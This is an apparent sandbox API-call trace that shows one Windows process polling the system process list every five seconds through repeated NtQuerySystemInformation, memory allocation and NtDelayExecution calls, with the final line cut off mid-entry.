[0224.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.961] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.968] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.975] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.981] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.988] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0224.994] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.995] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0224.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0224.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0224.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0224.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0224.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.002] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.009] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.015] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.016] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.017] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.022] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.030] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.033] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.033] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.038] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.045] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.047] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.052] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.058] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.061] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.066] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.068] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.069] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.073] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.079] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.087] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.094] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.097] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.101] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, 